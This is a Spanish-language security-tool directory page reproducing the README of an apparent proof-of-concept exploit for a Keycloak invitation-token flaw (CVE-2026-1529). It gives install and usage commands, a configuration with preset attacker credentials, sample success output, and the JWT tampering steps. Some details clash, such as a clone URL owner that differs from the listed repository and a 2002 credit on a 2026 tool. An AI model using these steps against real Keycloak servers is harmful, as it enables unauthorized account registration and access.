Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — Herramienta de explotación para CVE-2026-1529, que demuestra el registro no autorizado de organizaciones en Keycloak mediante la manipulación de tokens JWT. Incluye generación de tokens, manipulación y registro de usuarios con generación de informes. | Kitploit
Herramientas/GitHubGitHub/ackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónSeguridad de APIs
GitHubackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Herramienta de explotación para CVE-2026-1529, que demuestra el registro no autorizado de organizaciones en Keycloak mediante la manipulación de tokens JWT. Incluye generación de tokens, manipulación y registro de usuarios con generación de informes.

Ver RepositorioSitio web
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de Explotación CVE-2026-1529 para Keycloak

Keycloak: Registro no autorizado de organizaciones mediante validación incorrecta de tokens de invitación


Aviso Legal

Esta herramienta es solo para fines educativos y de pruebas de seguridad. Úsela únicamente en sistemas para los que tenga permiso explícito de prueba. El acceso no autorizado a sistemas informáticos es ilegal y poco ético. Los autores de esta herramienta no son responsables de ningún uso indebido o daño causado por este software.

Creado por: f3ds cr3w est, 2002


Descripción General

CVE-2026-1529 es una vulnerabilidad crítica en Keycloak que permite el registro no autorizado de organizaciones mediante una validación incorrecta de tokens de invitación. Esta herramienta de explotación demuestra la vulnerabilidad manipulando tokens JWT para registrar usuarios en organizaciones no autorizadas.

Detalles Técnicos

  • ID de CVE: CVE-2026-1529
  • Software Afectado: Keycloak (org.keycloak.services.resources.organizations)
  • Puntuación CVSS: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Vector de Ataque: Red
  • Complejidad del Ataque: Baja
  • Impacto: Acceso no autorizado a recursos de la organización

Descripción de la Vulnerabilidad

La vulnerabilidad existe en el proceso de validación de tokens JWT para invitaciones de organizaciones. Los atacantes pueden manipular los campos org_id y email en el payload del JWT, lo que les permite registrar usuarios en cualquier organización sin la autorización adecuada.


Instalación

Requisitos Previos

  • Python 3.7 o superior
  • Gestor de paquetes pip

Configuración

  1. Clone o descargue la herramienta de explotación:
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Instale las dependencias requeridas:
root@kitploit:~
pip install -r requirements.txt
  1. Haga ejecutable el script de explotación:
root@kitploit:~
chmod +x keycloak-exploit.py

Uso

Uso Básico

root@kitploit:~
# Uso estándar con URL objetivo
python keycloak-exploit.py https://target-keycloak.com

# Mostrar ayuda
python keycloak-exploit.py -h

# Mostrar versión
python keycloak-exploit.py -v

Uso Avanzado

root@kitploit:~
# Usar token de invitación personalizado
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Usar ID de organización personalizado
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Usar archivo de configuración personalizado
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Habilitar registro de depuración
python keycloak-exploit.py -d https://target-keycloak.com

Opciones de Línea de Comandos

OpciónDescripciónRequerido
targetURL objetivo de Keycloak (IP o dominio)Sí
-t, --tokenToken de invitación personalizado a usarNo
-o, --org-idID de organización personalizadoNo
-c, --configRuta al archivo de configuraciónNo
-d, --debugHabilitar registro de depuraciónNo
-v, --versionMostrar información de versiónNo
-h, --helpMostrar mensaje de ayudaNo

Salida

Explotación Exitosa

Cuando la explotación es exitosa, verá una salida como:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Explotación Fallida

Si la explotación falla, verá:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Estructura del Proyecto

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Script principal de explotación
├── requirements.txt             # Dependencias de Python
├── README.md                   # Este archivo
├── config/
│   └── default_config.json     # Configuración predeterminada
├── utils/
│   ├── jwt_utils.py            # Utilidades de manipulación JWT
│   ├── http_utils.py           # Utilidades de cliente HTTP
│   └── crypto_utils.py         # Utilidades criptográficas
├── output/
│   ├── logs/                   # Archivos de registro
│   └── reports/                # Informes de explotación

Configuración

Configuración Predeterminada

La herramienta utiliza un archivo de configuración predeterminado (config/default_config.json) con las siguientes opciones:

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Configuración Personalizada

Puede crear un archivo de configuración personalizado y usarlo con la opción -c:

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Detalles Técnicos

Proceso de Explotación

  1. Análisis del Objetivo: Verificar si el objetivo es una instancia vulnerable de Keycloak
  2. Generación de Token: Generar o usar un token de invitación personalizado
  3. Manipulación de Token: Manipular el payload del JWT para cambiar el ID de organización
  4. Registro de Usuario: Registrar un usuario usando el token manipulado
  5. Prueba de Inicio de Sesión: Verificar que el usuario creado puede iniciar sesión
  6. Generación de Informe: Crear un informe detallado de explotación

Manipulación de JWT

La herramienta explota la validación incorrecta de JWT mediante:

  1. Decodificación del token JWT sin verificación de firma
  2. Modificación del campo org_id para apuntar a una organización diferente
  3. Modificación del campo email si es necesario
  4. Re-codificación del token con el payload manipulado

Consideraciones de Seguridad

  • La herramienta utiliza manejo adecuado de errores y registro
  • Todas las solicitudes de red incluyen encabezados apropiados
  • Se realiza validación de entrada en todas las entradas del usuario
  • La herramienta respeta los códigos de respuesta del servidor objetivo

Solución de Problemas

Problemas Comunes

  1. Errores de Conexión

    • Verifique si la URL objetivo es accesible
    • Confirme que el objetivo es una instancia de Keycloak
    • Verifique la conectividad de red y la configuración del firewall
  2. Errores de Validación de Token

    • Asegúrese de que el formato del token sea correcto
    • Verifique si el token contiene los campos requeridos (org_id, email, invitation_type)
    • Confirme que el token no haya expirado
  3. Fallos de Registro

    • Verifique si el endpoint de registro es accesible
    • Confirme el formato del token manipulado
    • Verifique si el objetivo tiene habilitado el registro de organizaciones

Modo de Depuración

Habilite el registro de depuración para solución de problemas detallada:

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

Archivos de Registro

  • Registro principal: logs/exploit.log
  • Informes: output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

Metodología de Pruebas

Evaluación de Vulnerabilidad

La herramienta realiza las siguientes comprobaciones:

  1. Verificación de Salud: Confirma que el objetivo es una instancia de Keycloak
  2. Detección de Versión: Intenta detectar la versión de Keycloak
  3. Prueba de Endpoints: Prueba los endpoints relacionados con organizaciones
  4. Validación de Token: Valida la estructura del token JWT

Validación de Explotación

La explotación se considera exitosa si:

  1. El objetivo es vulnerable
  2. Se puede registrar un usuario usando el token manipulado
  3. El usuario registrado puede iniciar sesión correctamente
  4. Se genera un enlace de inicio de sesión válido

Mejores Prácticas de Seguridad

Para Organizaciones

  1. Aplicar Parches: Actualice a la versión más reciente de Keycloak
  2. Validación de Token: Implemente verificación adecuada de firma JWT
  3. Control de Acceso: Restrinja el registro de organizaciones a usuarios autorizados
  4. Monitoreo: Supervise actividades de registro sospechosas
  5. Seguridad de Red: Implemente reglas de firewall adecuadas

Para Investigadores de Seguridad

  1. Autorización: Solo pruebe sistemas para los que tenga permiso
  2. Divulgación Responsable: Reporte vulnerabilidades a los proveedores
  3. Documentación: Mantenga registros detallados de sus pruebas
  4. Pruebas Éticas: Siga prácticas de divulgación responsable

Licencia

Esta herramienta se proporciona solo para fines educativos y de pruebas de seguridad. Úsela bajo su propio riesgo.

Creado por: f3ds cr3w est, 2002

Contacto: Para preguntas o comentarios, consulte el repositorio del proyecto.


Registro de Cambios

Versión 1.0

  • Lanzamiento inicial
  • Funcionalidad básica de explotación
  • Capacidades de manipulación JWT
  • Generación de informes
  • Interfaz de línea de comandos

🙏 Agradecimientos

  • Equipo de desarrollo de Keycloak
  • Investigadores de seguridad que descubrieron CVE-2026-1529
  • La comunidad de seguridad de código abierto

Recuerde: Un gran poder conlleva una gran responsabilidad. Use esta herramienta con sabiduría y ética.

por f3ds cr3w est, 2002

Descargar herramienta